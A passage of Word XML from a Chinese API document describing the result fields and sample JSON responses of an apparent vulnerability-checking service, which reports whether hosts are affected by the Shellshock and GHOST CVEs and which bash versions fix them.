          <w:p w14:paraId="4D47BA24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53BCCD8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D263EDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0 表示不受影响，1表示受影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63A47024" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5BCF11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66238FF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D562FC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E73983E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64A599C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366F0B64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D14CDE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="022BD0D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F78B3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">结果详情，见 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ver_check_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 下</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14A3505D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40092004" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="391E0030" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EF9F6E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668197A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行错误时错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="584EB4D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1236"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="34CA9B1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E7C404B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FBB732E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353EA82B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC64825" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5511B772" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BABBD08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="667FBE49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB3E351" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09246A61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F7A8E7F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23B770B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fix_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F6B462A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="616F8981" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFB0850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C257F4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BB98923" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07CEC5E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="228A0B20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24D9A1EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55917906" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCC308" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CVE-2014-6271",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e807ecef881e17f7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version": "4.3-6ubuntu1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fix_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "4.3-7ubuntu1.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832DA4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CVE-2015-0235",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnmsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0000000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "msg": "if ghost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>glibc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not exist return '1234567890123456', otherwise return %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnmsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "title": "ghost_CVE-2015-0235_poc_check"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "ffd324ed2a80f7f9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDB85B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CVE-2014-7169",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "msg": "\\u5b58\\u5728\\u6f0f\\u6d1e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "vuln": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "info": "\\u5728/dev/shm\\u76ee\\u5f55\\u4e2d\\u53d1\\u73b0Poc\\u751f\\u6210\\u7684\\u6587\\u4ef6/dev/shm/QT_Test_1536521467"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "308012a1e4f2e7fe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version": "4.1-2ubuntu3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fix_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "4.1-2ubuntu3.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6429E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="_Toc115166326"/>
